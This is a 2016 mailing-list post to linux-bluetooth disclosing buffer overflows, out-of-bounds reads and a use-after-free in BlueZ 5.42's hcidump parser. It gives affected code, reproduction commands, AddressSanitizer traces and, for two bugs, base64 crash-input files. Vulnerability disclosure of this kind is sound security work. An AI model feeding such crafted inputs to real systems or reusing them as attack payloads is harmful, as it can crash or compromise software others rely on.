* multiple buffer overflows and out-of-bound reads
@ 2016-11-14 17:06 op7ic \x00
From: op7ic \x00 @ 2016-11-14 17:06 UTC (permalink / raw)
To: linux-bluetooth
[-- Attachment #1: Type: text/plain, Size: 248 bytes --]
Hello list,
I have been playing with the hcidump tool recently and came across the
following bugs coming from either out-of-bounds reads or buffer
overflows (see attached reports).
There are a couple more I'm working on and will send these later.
Cheers,
[-- Attachment #2: amp_dump_chanlist_OOB.txt --]
[-- Type: text/plain, Size: 4520 bytes --]
Machine: x86_64
OS: linux-gnu
Compiler: gcc
Compilation CFLAGS: -O0 -ggdb3 -fsanitize=address
Machine Type: x86_64-unknown-linux-gnu
BlueZ Version: 5.42
Release Status: release
Source: http://www.kernel.org/pub/linux/bluetooth/bluez-5.42.tar.xz
Description:
An out-of-bounds read was identified in the "amp_dump_chanlist" function in the "tools/parser/amp.c" source file. This issue can be triggered by processing a corrupted dump file and will result in an hcidump crash. To replicate this issue, use the attached sample below and execute the following command:
./tools/hcidump -a -r <PoC File>
PoC.file base64 encoded:
Affected code:
45     for (i = 0; i < num; i++) {
46         triplet = &chan_list->triplets[i];
47 
48         p_indent(level+2, 0);
49 
50         if (triplet->chans.first_channel >= 201) {
51             printf("Reg ext id %d reg class %d coverage class %d\n",
52                     triplet->ext.reg_extension_id,
53                     triplet->ext.reg_class,
54                     triplet->ext.coverage_class);
55         } else {
56             if (triplet->chans.num_channels == 1)
57 
Repeat-By:
echo <above base64> > PoC.b64
base64 -d PoC.b64 > PoC.file
valgrind ./tools/hcidump -a -r PoC.file
ASAN Report (bluez needs to be compiled with -fsanitize=address for this):
==27923==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60600000eff6 at pc 0x4a8615 bp 0x792d80053ec0 sp 0x792d80053eb8
READ of size 1 at 0x60600000eff6 thread T0
#0 0x4a8614 in amp_dump_chanlist tools/parser/amp.c:50
#1 0x4a8d58 in amp_assoc_dump tools/parser/amp.c:97
#2 0x492df4 in a2mp_create_req tools/parser/l2cap.c:1183
#3 0x492df4 in l2cap_parse tools/parser/l2cap.c:1382
#4 0x4a627f in l2cap_dump tools/parser/l2cap.c:1624
#5 0x479c9c in acl_dump tools/parser/hci.c:4041
#6 0x479c9c in hci_dump tools/parser/hci.c:4120
#7 0x4035d4 in parse tools/parser/parser.h:260
#8 0x4035d4 in read_dump tools/hcidump.c:425
#9 0x4035d4 in main tools/hcidump.c:810
#10 0x71c2389e7b44 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b44)
#11 0x40529e (/opt/bluez/tools/hcidump+0x40529e)
0x60600000eff6 is located 0 bytes to the right of 54-byte region [0x60600000efc0,0x60600000eff6)
allocated by thread T0 here:
#0 0x71c238dc573f in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.1+0x5473f)
#1 0x4a50e7 in l2cap_dump tools/parser/l2cap.c:1581
#2 0x1f
SUMMARY: AddressSanitizer: heap-buffer-overflow tools/parser/amp.c:50 amp_dump_chanlist
Shadow bytes around the buggy address:
==27923==ABORTING
[-- Attachment #3: ba2str_OOB.txt --]
[-- Type: text/plain, Size: 5712 bytes --]
Machine: x86_64
OS: linux-gnu
Compiler: gcc
Compilation CFLAGS: -O0 -ggdb3 -fsanitize=address
Machine Type: x86_64-unknown-linux-gnu
BlueZ Version: 5.42
Release Status: release
Source: http://www.kernel.org/pub/linux/bluetooth/bluez-5.42.tar.xz
Description:
An out-of-bounds read was observed in the "ba2str" function in the "bluetooth.c" source file. This issue can be triggered by processing a corrupted dump file and will result in an hcidump crash. To replicate this issue, use the attached sample below and execute the following command:
./tools/hcidump -a -r <PoC File>
PoC.file base64 encoded:
Affected code:
77 int ba2str(const bdaddr_t *ba, char *str)
78 {
79     return sprintf(str, "%2.2X:%2.2X:%2.2X:%2.2X:%2.2X:%2.2X",
80         ba->b[5], ba->b[4], ba->b[3], ba->b[2], ba->b[1], ba->b[0]);
81 }
Repeat-By:
echo <above base64> > PoC.b64
base64 -d PoC.b64 > PoC.file
valgrind ./tools/hcidump -a -r PoC.file
ASAN Report (bluez needs to be compiled with -fsanitize=address for this):
==19853==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61b00001f778 at pc 0x580ae5 bp 0x7342a57f5cf0 sp 0x7342a57f5ce8
READ of size 1 at 0x61b00001f778 thread T0
#0 0x580ae4 in ba2str lib/bluetooth.c:80
#1 0x43f407 in p_ba2str tools/parser/parser.h:159
#2 0x43f407 in extended_inq_result_dump tools/parser/hci.c:3512
#3 0x481246 in event_dump tools/parser/hci.c:3963
#4 0x481246 in hci_dump tools/parser/hci.c:4116
#5 0x4035d4 in parse tools/parser/parser.h:260
#6 0x4035d4 in read_dump tools/hcidump.c:425
#7 0x4035d4 in main tools/hcidump.c:810
#8 0x72dfc0e31b44 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b44)
#9 0x40529e (/opt/bluez/tools/hcidump+0x40529e)
0x61b00001f778 is located 28 bytes to the right of 1500-byte region [0x61b00001f180,0x61b00001f75c)
allocated by thread T0 here:
#0 0x72dfc120f73f in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.1+0x5473f)
#1 0x402f12 in read_dump tools/hcidump.c:288
#2 0x402f12 in main tools/hcidump.c:810
SUMMARY: AddressSanitizer: heap-buffer-overflow lib/bluetooth.c:80 ba2str
Shadow bytes around the buggy address:
==19853==ABORTING
[-- Attachment #4: commands_dump_BO.txt --]
[-- Type: text/plain, Size: 4535 bytes --]
Machine: x86_64
OS: linux-gnu
Compiler: gcc
Compilation CFLAGS: -O0 -ggdb3 -fsanitize=address
Machine Type: x86_64-unknown-linux-gnu
BlueZ Version: 5.42
Release Status: release
Source: http://www.kernel.org/pub/linux/bluetooth/bluez-5.42.tar.xz
Description:
A buffer overflow was observed in the "commands_dump" function in the "tools/parser/csr.c" source file. The issue exists because the "commands" array is overflowed by the supplied parameter, due to a lack of boundary checks on the size of the buffer from the frame ("frm->ptr") parameter. This issue can be triggered by processing a corrupted dump file and will result in an hcidump crash. To replicate this issue, use the attached sample below and execute the following command:
./tools/hcidump -a -r <PoC File>
PoC.file base64 encoded:
Affected code:
143 static inline void commands_dump(int level, char *str, struct frame *frm)
144 {
145     unsigned char commands[64];
146     unsigned int i;
147 
148     memcpy(commands, frm->ptr, frm->len);
149 
150     p_indent(level, frm);
151     printf("%s: commands", str);
152     for (i = 0; i < frm->len; i++)
153         printf(" 0x%02x", commands[i]);
154     printf("\n");
155 }
Repeat-By:
echo <above base64> > PoC.b64
base64 -d PoC.b64 > PoC.file
valgrind ./tools/hcidump -a -r PoC.file
ASAN Report (bluez needs to be compiled with -fsanitize=address for this):
==20429==ERROR: AddressSanitizer: unknown-crash on address 0x7fc28f471400 at pc 0x570527 bp 0x7fc28f471250 sp 0x7fc28f471248
WRITE of size 69 at 0x7fc28f471400 thread T0
#0 0x570526 in commands_dump tools/parser/csr.c:148
#1 0x570526 in pskey_dump tools/parser/csr.c:284
#2 0x576cae in bccmd_dump tools/parser/csr.c:496
#3 0x57d48a in csr_dump tools/parser/csr.c:569
#4 0x482b5e in event_dump tools/parser/hci.c:3823
#5 0x482b5e in hci_dump tools/parser/hci.c:4116
#6 0x4035d4 in parse tools/parser/parser.h:260
#7 0x4035d4 in read_dump tools/hcidump.c:425
#8 0x4035d4 in main tools/hcidump.c:810
#9 0x71b152861b44 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b44)
#10 0x40529e (/opt/bluez/tools/hcidump+0x40529e)
Address 0x7fc28f471400 is located in stack of thread T0 at offset 384 in frame
#0 0x5661ff in pskey_dump tools/parser/csr.c:239
This frame has 6 object(s):
[32, 38) 'b'
[96, 104) 'features'
[160, 168) 't'
[224, 242) 'addr'
[288, 344) 'tm'
[384, 448) 'commands' <== Memory access at offset 384 partially overflows this variable
HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
(longjmp and C++ exceptions *are* supported)
SUMMARY: AddressSanitizer: unknown-crash tools/parser/csr.c:148 commands_dump
Shadow bytes around the buggy address:
==20429==ABORTING
[-- Attachment #5: conf_opt_UaF.txt --]
[-- Type: text/plain, Size: 4817 bytes --]
Machine: x86_64
OS: linux-gnu
Compiler: gcc
Compilation CFLAGS: -O0 -ggdb3 -fsanitize=address
Machine Type: x86_64-unknown-linux-gnu
BlueZ Version: 5.42
Release Status: release
Source: http://www.kernel.org/pub/linux/bluetooth/bluez-5.42.tar.xz
Description:
A use-after-free was identified in the "conf_opt" function in the "tools/parser/l2cap.c" source file. This issue can be triggered by processing a corrupted dump file and will result in an hcidump crash. To replicate this issue, use the attached sample below and execute the following command:
./tools/hcidump -a -r <PoC File>
PoC.file base64 encoded:
Affected code:
636 static void conf_opt(int level, void *ptr, int len, int in, uint16_t handle,
637                      uint16_t cid)
638 {
639     int indent = 0;
640     p_indent(level, 0);
641     while (len > 0) {
642         l2cap_conf_opt *h = ptr;
643 
644         ptr += L2CAP_CONF_OPT_SIZE + h->len;
645         len -= L2CAP_CONF_OPT_SIZE + h->len;
646 
647         if (h->type & 0x80)
648             printf("[");
649 
650         if (indent++) {
651             printf("\n");
652             p_indent(level, 0);
653         }
Repeat-By:
echo <above base64> > PoC.b64
base64 -d PoC.b64 > PoC.file
valgrind ./tools/hcidump -a -r PoC.file
ASAN Report (bluez needs to be compiled with -fsanitize=address for this):
==27419==ERROR: AddressSanitizer: heap-use-after-free on address 0x60600000efd4 at pc 0x48d77a bp 0x72b7bc0bf2b0 sp 0x72b7bc0bf2a8
READ of size 1 at 0x60600000efd4 thread T0
#0 0x48d779 in conf_opt tools/parser/l2cap.c:644
#1 0x498a05 in conf_rsp tools/parser/l2cap.c:781
#2 0x498a05 in l2cap_parse tools/parser/l2cap.c:1256
#3 0x4a627f in l2cap_dump tools/parser/l2cap.c:1624
#4 0x479c9c in acl_dump tools/parser/hci.c:4041
#5 0x479c9c in hci_dump tools/parser/hci.c:4120
#6 0x4035d4 in parse tools/parser/parser.h:260
#7 0x4035d4 in read_dump tools/hcidump.c:425
#8 0x4035d4 in main tools/hcidump.c:810
#9 0x6f259422cb44 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b44)
#10 0x40529e (/opt/bluez/tools/hcidump+0x40529e)
0x60600000efd4 is located 20 bytes inside of 50-byte region [0x60600000efc0,0x60600000eff2)
freed by thread T0 here:
#0 0x6f259460a527 in __interceptor_free (/usr/lib/x86_64-linux-gnu/libasan.so.1+0x54527)
#1 0x483696 in read_remote_version_complete_dump tools/parser/hci.c:3200
#2 0x483696 in event_dump tools/parser/hci.c:3902
#3 0x483696 in hci_dump tools/parser/hci.c:4116
previously allocated by thread T0 here:
#0 0x6f259460a73f in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.1+0x5473f)
#1 0x58f374 in hci_uint2str lib/hci.c:100
#2 0x58f374 in lmp_vertostr lib/hci.c:675
SUMMARY: AddressSanitizer: heap-use-after-free tools/parser/l2cap.c:644 conf_opt
Shadow bytes around the buggy address:
==27419==ABORTING
[-- Attachment #6: l2cap_dump_BO.txt --]
[-- Type: text/plain, Size: 4304 bytes --]
Machine: x86_64
OS: linux-gnu
Compiler: gcc
Compilation CFLAGS: -O0 -ggdb3 -fsanitize=address
Machine Type: x86_64-unknown-linux-gnu
BlueZ Version: 5.42
Release Status: release
Source: http://www.kernel.org/pub/linux/bluetooth/bluez-5.42.tar.xz
Description:
A buffer overflow was observed in the "l2cap_dump" function in the "tools/parser/l2cap.c" source file. This issue can be triggered by processing a corrupted dump file and will result in an hcidump crash. To replicate this issue, use the attached sample below and execute the following command:
./tools/hcidump -a -r <PoC File>
PoC.file base64 encoded:
BAAqBRkQAKLNFRU0AgIHFwIXAAEABRkgAAAANAI9WAY+uugDPj4+WBo6utgDBAEA/5wAADgaProA
AwQB
Affected code:
1570     }
1571 
1572     if (!(fr = get_frame(frm->handle))) {
1573         fprintf(stderr, "Not enough connection handles\n");
1574         raw_dump(level, frm);
1575         return;
1576     }
1577 
1578     if (fr->data)
1579         free(fr->data);
1580 
1581     if (!(fr->data = malloc(dlen + L2CAP_HDR_SIZE))) {
1582         perror("Can't allocate L2CAP reassembly buffer");
1583         return;
1584     }
1585     memcpy(fr->data, frm->ptr, frm->len);
1586     fr->data_len = dlen + L2CAP_HDR_SIZE;
1587     fr->len = frm->len;
1588     fr->ptr = fr->data;
1589     fr->dev_id = frm->dev_id;
1590     fr->in = frm->in;
Repeat-By:
echo <above base64> > PoC.b64
base64 -d PoC.b64 > PoC.file
valgrind ./tools/hcidump -a -r PoC.file
ASAN Report (bluez needs to be compiled with -fsanitize=address for this):
==17644==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61b00001f75c at pc 0x79c51d04e792 bp 0x79f5616c33d0 sp 0x79f5616c2b90
READ of size 4294967295 at 0x61b00001f75c thread T0
#0 0x79c51d04e791 (/usr/lib/x86_64-linux-gnu/libasan.so.1+0x2e791)
#1 0x4a52d2 in l2cap_dump tools/parser/l2cap.c:1585
#2 0x479c9c in acl_dump tools/parser/hci.c:4041
#3 0x479c9c in hci_dump tools/parser/hci.c:4120
#4 0x4035d4 in parse tools/parser/parser.h:260
#5 0x4035d4 in read_dump tools/hcidump.c:425
#6 0x4035d4 in main tools/hcidump.c:810
#7 0x79c51cc96b44 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b44)
#8 0x40529e (/opt/bluez/tools/hcidump+0x40529e)
0x61b00001f75c is located 0 bytes to the right of 1500-byte region [0x61b00001f180,0x61b00001f75c)
allocated by thread T0 here:
#0 0x79c51d07473f in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.1+0x5473f)
#1 0x402f12 in read_dump tools/hcidump.c:288
#2 0x402f12 in main tools/hcidump.c:810
SUMMARY: AddressSanitizer: heap-buffer-overflow ??:0 ??
Shadow bytes around the buggy address:
==17644==ABORTING
[-- Attachment #7: le_meta_ev_dump_OOB.txt --]
[-- Type: text/plain, Size: 4880 bytes --]
Machine: x86_64
OS: linux-gnu
Compiler: gcc
Compilation CFLAGS: -O0 -ggdb3 -fsanitize=address
Machine Type: x86_64-unknown-linux-gnu
BlueZ Version: 5.42
Release Status: release
Source: http://www.kernel.org/pub/linux/bluetooth/bluez-5.42.tar.xz
Description:
An out-of-bounds read was observed in the "le_meta_ev_dump" function in the "tools/parser/hci.c" source file. This issue exists because 'subevent', which is used to read the correct element from the 'ev_le_meta_str' array, is overflowed. This issue can be triggered by processing a corrupted dump file and will result in an hcidump crash. To replicate this issue, use the attached sample below and execute the following command:
./tools/hcidump -a -r <PoC File>
PoC.file base64 encoded:
Affected code:
3659 static inline void le_meta_ev_dump(int level, struct frame *frm)
3660 {
3661     evt_le_meta_event *mevt = frm->ptr;
3662     uint8_t subevent;
3663 
3664     subevent = mevt->subevent;
3665 
3666     frm->ptr += EVT_LE_META_EVENT_SIZE;
3667     frm->len -= EVT_LE_META_EVENT_SIZE;
3668 
3669     p_indent(level, frm);
3670     printf("%s\n", ev_le_meta_str[subevent]);
3671 
3672     switch (mevt->subevent) {
3673     case EVT_LE_CONN_COMPLETE:
3674         evt_le_conn_complete_dump(level + 1, frm);
3675         break;
3676     case EVT_LE_ADVERTISING_REPORT:
3677         evt_le_advertising_report_dump(level + 1, frm);
3678         break;
3679     case EVT_LE_CONN_UPDATE_COMPLETE:
3680         evt_le_conn_update_complete_dump(level + 1, frm);
3681         break;
3682     case EVT_LE_READ_REMOTE_USED_FEATURES_COMPLETE:
3683         evt_le_read_remote_used_features_complete_dump(level + 1, frm);
3684         break;
3685     default:
3686         raw_dump(level, frm);
3687         break;
3688     }
3689 }
Repeat-By:
echo <above base64> > PoC.b64
base64 -d PoC.b64 > PoC.file
valgrind ./tools/hcidump -a -r PoC.file
ASAN Report (bluez needs to be compiled with -fsanitize=address for this):
==30076==ERROR: AddressSanitizer: global-buffer-overflow on address 0x0000005bd780 at pc 0x48701d bp 0x7d1fca13a5c0 sp 0x7d1fca13a5b8
READ of size 8 at 0x0000005bd780 thread T0
#0 0x48701c in le_meta_ev_dump tools/parser/hci.c:3670
#1 0x48701c in event_dump tools/parser/hci.c:3991
#2 0x48701c in hci_dump tools/parser/hci.c:4116
#3 0x4035d4 in parse tools/parser/parser.h:260
#4 0x4035d4 in read_dump tools/hcidump.c:425
#5 0x4035d4 in main tools/hcidump.c:810
#6 0x7bf781766b44 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b44)
#7 0x40529e (/opt/bluez/tools/hcidump+0x40529e)
0x0000005bd780 is located 15 bytes to the right of global variable '*.LC615' from 'tools/parser/hci.c' (0x5bd760) of size 17
'*.LC615' is ascii string 'Inquiry Complete'
0x0000005bd780 is located 32 bytes to the left of global variable '*.LC616' from 'tools/parser/hci.c' (0x5bd7a0) of size 15
'*.LC616' is ascii string 'Inquiry Result'
SUMMARY: AddressSanitizer: global-buffer-overflow tools/parser/hci.c:3670 le_meta_ev_dump
Shadow bytes around the buggy address:
==30076==ABORTING
[-- Attachment #8: pin_code_reply_dump_BO.txt --]
[-- Type: text/plain, Size: 5512 bytes --]
Machine: x86_64
OS: linux-gnu
Compiler: gcc
Compilation CFLAGS: -O0 -ggdb3 -fsanitize=address
Machine Type: x86_64-unknown-linux-gnu
BlueZ Version: 5.42
Release Status: release
Source: http://www.kernel.org/pub/linux/bluetooth/bluez-5.42.tar.xz
Description:
A buffer overflow was observed in the "pin_code_reply_dump" function in the "tools/parser/hci.c" source file. The issue exists because the "pin" array is overflowed by the supplied parameter, due to a lack of boundary checks on the size of the buffer from the frame ("pin_code_reply_cp *cp") parameter. This issue can be triggered by processing a corrupted dump file and will result in an hcidump crash. To replicate this issue, use the attached sample below and execute the following command:
./tools/hcidump -a -r <PoC File>
PoC.file base64 encoded:
Affected code:
981 static inline void pin_code_reply_dump(int level, struct frame *frm)
982 {
983     pin_code_reply_cp *cp = frm->ptr;
984     char addr[18], pin[17];
985 
986     p_indent(level, frm);
987     p_ba2str(&cp->bdaddr, addr);
988     memset(pin, 0, sizeof(pin));
989     if (parser.flags & DUMP_NOVENDOR)
990         memset(pin, '*', cp->pin_len);
991     else
992         memcpy(pin, cp->pin_code, cp->pin_len);
993     printf("bdaddr %s len %d pin \'%s\'\n", addr, cp->pin_len, pin);
994 }
Repeat-By:
echo <above base64> > PoC.b64
base64 -d PoC.b64 > PoC.file
valgrind ./tools/hcidump -a -r PoC.file
ASAN Report (bluez needs to be compiled with -fsanitize=address for this):
==24887==ERROR: AddressSanitizer: unknown-crash on address 0x7aea85364520 at pc 0x4787ca bp 0x7aea85364450 sp 0x7aea85364448
WRITE of size 209 at 0x7aea85364520 thread T0
#0 0x4787c9 in pin_code_reply_dump tools/parser/hci.c:992
#1 0x4787c9 in command_dump tools/parser/hci.c:1752
#2 0x479623 in hci_dump tools/parser/hci.c:4112
#3 0x4035d4 in parse tools/parser/parser.h:260
#4 0x4035d4 in read_dump tools/hcidump.c:425
#5 0x4035d4 in main tools/hcidump.c:810
#6 0x6f5f04015b44 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b44)
#7 0x40529e (/opt/bluez/tools/hcidump+0x40529e)
Address 0x7aea85364520 is located in stack of thread T0 at offset 160 in frame
#0 0x46b3cf in command_dump tools/parser/hci.c:1685
This frame has 6 object(s):
[32, 38) 'b'
[96, 104) 't'
[160, 177) 'pin' <== Memory access at offset 160 partially overflows this variable
[224, 242) 'addr' <== Memory access at offset 160 partially underflows this variable
[288, 344) 'tm' <== Memory access at offset 160 partially underflows this variable
[384, 633) 'name'
HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
(longjmp and C++ exceptions *are* supported)
SUMMARY: AddressSanitizer: unknown-crash tools/parser/hci.c:992 pin_code_reply_dump
Shadow bytes around the buggy address:
==24887==ABORTING
[-- Attachment #9: print_cont_state_OOB.txt --]
[-- Type: text/plain, Size: 4171 bytes --]
Machine: x86_64
OS: linux-gnu
Compiler: gcc
Compilation CFLAGS: -O0 -ggdb3 -fsanitize=address
Machine Type: x86_64-unknown-linux-gnu
BlueZ Version: 5.42
Release Status: release
Source: http://www.kernel.org/pub/linux/bluetooth/bluez-5.42.tar.xz
Description:
An out-of-bounds read was observed in the "print_cont_state" function in the "tools/parser/sdp.c" source file. This issue can be triggered by processing a corrupted dump file and will result in an hcidump crash. To replicate this issue, use the attached sample below and execute the following command:
./tools/hcidump -a -r <PoC File>
PoC.file base64 encoded:
Affected code:
568 static inline void print_cont_state(int level, unsigned char *buf)
569 {
570     uint8_t cont = buf[0];
571     int i;
572 
573     p_indent(level, 0);
574     printf("cont");
575     for (i = 0; i < cont + 1; i++)
576         printf(" %2.2X", buf[i]);
577     printf("\n");
578 }
Repeat-By:
echo <above base64> > PoC.b64
base64 -d PoC.b64 > PoC.file
valgrind ./tools/hcidump -a -r PoC.file
ASAN Report (bluez needs to be compiled with -fsanitize=address for this):
==6337==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60600000ef96 at pc 0x4e39ec bp 0x7f3553ec2550 sp 0x7f3553ec2548
READ of size 1 at 0x60600000ef96 thread T0
#0 0x4e39eb in print_cont_state tools/parser/sdp.c:576
#1 0x4e39eb in sdp_dump tools/parser/sdp.c:764
#2 0x49a9c2 in l2cap_parse tools/parser/l2cap.c:1464
#3 0x4a627f in l2cap_dump tools/parser/l2cap.c:1624
#4 0x479c9c in acl_dump tools/parser/hci.c:4041
#5 0x479c9c in hci_dump tools/parser/hci.c:4120
#6 0x4035d4 in parse tools/parser/parser.h:260
#7 0x4035d4 in read_dump tools/hcidump.c:425
#8 0x4035d4 in main tools/hcidump.c:810
#9 0x7da2df158b44 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b44)
#10 0x40529e (/opt/bluez/tools/hcidump+0x40529e)
0x60600000ef96 is located 0 bytes to the right of 54-byte region [0x60600000ef60,0x60600000ef96)
allocated by thread T0 here:
#0 0x7da2df53673f in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.1+0x5473f)
#1 0x4a50e7 in l2cap_dump tools/parser/l2cap.c:1581
#2 0x1f
SUMMARY: AddressSanitizer: heap-buffer-overflow tools/parser/sdp.c:576 print_cont_state
Shadow bytes around the buggy address:
==6337==ABORTING
[-- Attachment #10: read_n_BO.txt --]
[-- Type: text/plain, Size: 9360 bytes --]
Machine: x86_64
OS: linux-gnu
Compiler: gcc
Compilation CFLAGS: -O0 -ggdb3 -fsanitize=address
Machine Type: x86_64-unknown-linux-gnu
BlueZ Version: 5.42
Release Status: release
Source: http://www.kernel.org/pub/linux/bluetooth/bluez-5.42.tar.xz
Description:
A buffer overflow was observed in "read_n" function in "tools/hcidump.c" source file. This issue can be triggered by processing a corrupted dump file and will result in hcidump crash. To replicate this issue use the attached sample below and execute the following command:
./tools/hcidump -a -r <PoC File>
PoC.file base64 encoded:
Affected code:
104 static inline int read_n(int fd, char *buf, int len)
105 {
106     int t = 0, w;
107
108     while (len > 0) {
109         if ((w = read(fd, buf, len)) < 0) {
110             if (errno == EINTR || errno == EAGAIN)
111                 continue;
112             return -1;
113         }
114         if (!w)
115             return 0;
116         len -= w; buf += w; t += w;
117     }
118     return t;
119 }
Repeat-By:
echo <above base64> > PoC.b64
base64 -d PoC.b64 > PoC.file
valgrind ./tools/hcidump -a -r PoC.file
ASAN Report (bluez needs to be compiled with -fsanitize=address for this):
==19127==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61b00001f75c at pc 0x7034529f99b6 bp 0x7289d18014f0 sp 0x7289d18014d8
WRITE of size 3712 at 0x61b00001f75c thread T0
#0 0x7034529f99b5 in read (/usr/lib/x86_64-linux-gnu/libasan.so.1+0x299b5)
#1 0x403a3b in read_n tools/hcidump.c:109
#2 0x403a3b in read_dump tools/hcidump.c:397
#3 0x403a3b in main tools/hcidump.c:810
#4 0x703452646b44 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b44)
#5 0x40529e (/opt/bluez/tools/hcidump+0x40529e)
0x61b00001f75c is located 0 bytes to the right of 1500-byte region [0x61b00001f180,0x61b00001f75c)
allocated by thread T0 here:
#0 0x703452a2473f in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.1+0x5473f)
#1 0x402f12 in read_dump tools/hcidump.c:288
#2 0x402f12 in main tools/hcidump.c:810
SUMMARY: AddressSanitizer: heap-buffer-overflow ??:0 read
==19127==ABORTING
[-- Attachment #11: sdp_dump_OOB.txt --]
[-- Type: text/plain, Size: 3960 bytes --]
Machine: x86_64
OS: linux-gnu
Compiler: gcc
Compilation CFLAGS: -O0 -ggdb3 -fsanitize=address
Machine Type: x86_64-unknown-linux-gnu
BlueZ Version: 5.42
Release Status: release
Source: http://www.kernel.org/pub/linux/bluetooth/bluez-5.42.tar.xz
Description:
An out-of-bound read was observed in "sdp_dump" function in "tools/parser/sdp.c" source file. This issue can be triggered by processing a corrupted dump file and will result in hcidump crash. To replicate this issue use the attached sample below and execute the following command:
./tools/hcidump -a -r <PoC File>
PoC.file base64 encoded:
IAAABP8EDP///3//AgICFwIXAAEAAj4AAAEAAAC1tY8ABADrGgD/jikAmM0gAPf/GRAAkI0VAJ8C
AgITAhcAAAAFPgAAAQz///9//wICAhcCFwABAAI+AAAAtbX/GRAAkI0VAJ8CAgAAAPgCAgICQAAA
Affected code:
749     case SDP_SERVICE_ATTR_RSP:
750         /* Parse AttributeByteCount */
751         count = p_get_u16(frm);
752         p_indent(level + 1, frm);
753         printf("count %d\n", count);
754
755         /* Parse ContinuationState */
756         cont = *(unsigned char *)(frm->ptr + count);
757
758         if (cont == 0) {
759             /* Parse AttributeList */
760             print_attr_list(level + 1, frame_get(frm, count));
761         } else
762             frame_add(frm, count);
763
764         print_cont_state(level + 1, frm->ptr + count);
765         break;
766
Repeat-By:
echo <above base64> > PoC.b64
base64 -d PoC.b64 > PoC.file
valgrind ./tools/hcidump -a -r PoC.file
ASAN Report (bluez needs to be compiled with -fsanitize=address for this):
==17871==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61b00001fe8f at pc 0x4e30b5 bp 0x7ce9e036fa90 sp 0x7ce9e036fa88
READ of size 1 at 0x61b00001fe8f thread T0
#0 0x4e30b4 in sdp_dump tools/parser/sdp.c:756
#1 0x49a9c2 in l2cap_parse tools/parser/l2cap.c:1464
#2 0x479c9c in acl_dump tools/parser/hci.c:4041
#3 0x479c9c in hci_dump tools/parser/hci.c:4120
#4 0x4035d4 in parse tools/parser/parser.h:260
#5 0x4035d4 in read_dump tools/hcidump.c:425
#6 0x4035d4 in main tools/hcidump.c:810
#7 0x6c387c278b44 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b44)
#8 0x40529e (/opt/bluez/tools/hcidump+0x40529e)
AddressSanitizer can not describe address in more detail (wild memory access suspected).
SUMMARY: AddressSanitizer: heap-buffer-overflow tools/parser/sdp.c:756 sdp_dump
==17871==ABORTING
[-- Attachment #12: set_ext_ctrl_BO.txt --]
[-- Type: text/plain, Size: 3973 bytes --]
Machine: x86_64
OS: linux-gnu
Compiler: gcc
Compilation CFLAGS: -O0 -ggdb3 -fsanitize=address
Machine Type: x86_64-unknown-linux-gnu
BlueZ Version: 5.42
Release Status: release
Source: http://www.kernel.org/pub/linux/bluetooth/bluez-5.42.tar.xz
Description:
A buffer overflow was observed in "set_ext_ctrl" function in "tools/parser/l2cap.c" source file. This issue can be triggered by processing a corrupted dump file and will result in hcidump crash. To replicate this issue use the attached sample below and execute the following command:
./tools/hcidump -a -r <PoC File>
PoC.file base64 encoded:
Affected code:
225 static void set_ext_ctrl(int in, uint16_t handle, uint16_t cid,
226                          uint8_t ext_ctrl)
227 {
228     register cid_info *table = cid_table[in];
229     register int i;
230
231     for (i = 0; i < CID_TABLE_SIZE; i++)
232         if (table[i].handle == handle && table[i].cid == cid)
233             table[i].ext_ctrl = ext_ctrl;
234 }
235
Repeat-By:
echo <above base64> > PoC.b64
base64 -d PoC.b64 > PoC.file
valgrind ./tools/hcidump -a -r PoC.file
ASAN Report (bluez needs to be compiled with -fsanitize=address for this):
==29005==ERROR: AddressSanitizer: global-buffer-overflow on address 0x000000830251 at pc 0x48d708 bp 0x7b4d8ac14f70 sp 0x7b4d8ac14f68
WRITE of size 1 at 0x000000830251 thread T0
#0 0x48d707 in set_ext_ctrl tools/parser/l2cap.c:233
#1 0x48d707 in conf_opt tools/parser/l2cap.c:691
#2 0x498a05 in conf_rsp tools/parser/l2cap.c:781
#3 0x498a05 in l2cap_parse tools/parser/l2cap.c:1256
#4 0x479c9c in acl_dump tools/parser/hci.c:4041
#5 0x479c9c in hci_dump tools/parser/hci.c:4120
#6 0x4035d4 in parse tools/parser/parser.h:260
#7 0x4035d4 in read_dump tools/hcidump.c:425
#8 0x4035d4 in main tools/hcidump.c:810
#9 0x6d210d1b7b44 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b44)
#10 0x40529e (/opt/bluez/tools/hcidump+0x40529e)
0x000000830251 is located 1 bytes to the right of global variable 'frame_table' from 'tools/parser/sdp.c' (0x82ff80) of size 720
SUMMARY: AddressSanitizer: global-buffer-overflow tools/parser/l2cap.c:233 set_ext_ctrl
==29005==ABORTING
[-- Attachment #13: set_mode_BO.txt --]
[-- Type: text/plain, Size: 4058 bytes --]
Machine: x86_64
OS: linux-gnu
Compiler: gcc
Compilation CFLAGS: -O0 -ggdb3 -fsanitize=address
Machine Type: x86_64-unknown-linux-gnu
BlueZ Version: 5.42
Release Status: release
Source: http://www.kernel.org/pub/linux/bluetooth/bluez-5.42.tar.xz
Description:
